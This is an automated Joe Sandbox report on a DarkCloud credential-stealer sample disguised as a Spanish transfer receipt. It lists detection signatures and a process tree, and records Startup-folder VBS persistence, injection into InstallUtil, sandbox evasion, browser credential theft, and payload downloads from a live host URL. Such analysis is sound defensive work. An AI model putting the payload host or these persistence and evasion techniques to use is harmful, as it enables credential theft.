Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Comprobante transferencia 5678373888272653688262553.exe

Overview

General Information

Sample name:Comprobante transferencia 5678373888272653688262553.exe
Analysis ID:1618862
MD5:365dbe320e1cad52761be88c423d63b3
SHA1:836c6b3c078772af24cbdc32f99bd0ab851180af
SHA256:e51878878bc2c25af3ed62928903b952f576d687be143f7d2a5cf85f7f0aa6b6
Tags:exeuser-TeamDreier
Infos:

Detection

DarkCloud
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected Generic Dropper
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Comprobante transferencia 5678373888272653688262553.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe" MD5: 365DBE320E1CAD52761BE88C423D63B3)
    • InstallUtil.exe (PID: 1268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WmiPrvSE.exe (PID: 6420 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • wscript.exe (PID: 6596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsClosed.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Roaming\IsClosed.exe" MD5: 365DBE320E1CAD52761BE88C423D63B3)
      • InstallUtil.exe (PID: 3552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x2d974:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
          Click to see the 24 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.Comprobante transferencia 5678373888272653688262553.exe.6700000.10.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              5.2.IsClosed.exe.3b86c88.1.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                5.2.IsClosed.exe.3b86c88.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  7.2.InstallUtil.exe.753dc8.1.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                    Click to see the 32 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , ProcessId: 6596, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs" , ProcessId: 6596, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe, ProcessId: 4956, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeReversingLabs: Detection: 35%
                    Multi AV Scanner detection for submitted file
                    Source: Comprobante transferencia 5678373888272653688262553.exeVirustotal: Detection: 34%Perma Link
                    Source: Comprobante transferencia 5678373888272653688262553.exeReversingLabs: Detection: 35%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: global trafficHTTP traffic detected: GET /Ilmseyropc.mp4 HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Ilmseyropc.mp4 HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /Ilmseyropc.mp4 HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Ilmseyropc.mp4 HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: alcomax.com.co
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2114998895.00000000060F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alcomax.com.co
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alcomax.com.co/Ilmseyropc.mp4
                    Source: Comprobante transferencia 5678373888272653688262553.exe, IsClosed.exe.0.drString found in binary or memory: https://alcomax.com.co/Ilmseyropc.mp419dEtOCOgUB/OTYL7rs/pDQ==
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.5:49705 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Writes or reads registry keys via WMI
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_00E3168F0_2_00E3168F
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_00E3BA980_2_00E3BA98
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_00E3C0280_2_00E3C028
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_00E316A60_2_00E316A6
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_00E3179D0_2_00E3179D
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_00E318190_2_00E31819
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_0703F7C80_2_0703F7C8
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_0703FAE80_2_0703FAE8
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_0703E6E80_2_0703E6E8
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_0703E1A80_2_0703E1A8
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_070200060_2_07020006
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeCode function: 0_2_070200400_2_07020040
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C931585_2_00C93158
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C9168F5_2_00C9168F
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C9BA985_2_00C9BA98
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C9C0285_2_00C9C028
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C916A65_2_00C916A6
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C9179D5_2_00C9179D
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_00C918195_2_00C91819
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_0712F7C85_2_0712F7C8
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_0712FAE85_2_0712FAE8
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_0712E6E85_2_0712E6E8
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_0712E1A85_2_0712E1A8
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_071100275_2_07110027
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeCode function: 5_2_071100405_2_07110040
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000000.2050627087.0000000000480000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDnkebcxona.exe6 vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118805841.00000000068A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegalloperdix.exe vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAyksxp.dll" vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegalloperdix.exe vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDnkebcxona.exe6 vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegalloperdix.exe vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2115794595.00000000062F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAyksxp.dll" vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2089736087.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exeBinary or memory string: OriginalFilenameDnkebcxona.exe6 vs Comprobante transferencia 5678373888272653688262553.exe
                    Source: Comprobante transferencia 5678373888272653688262553.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: InstallUtil.exe, 00000002.00000002.3307100438.000000000046D000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/5@1/1
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exeMutant created: NULL
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs"
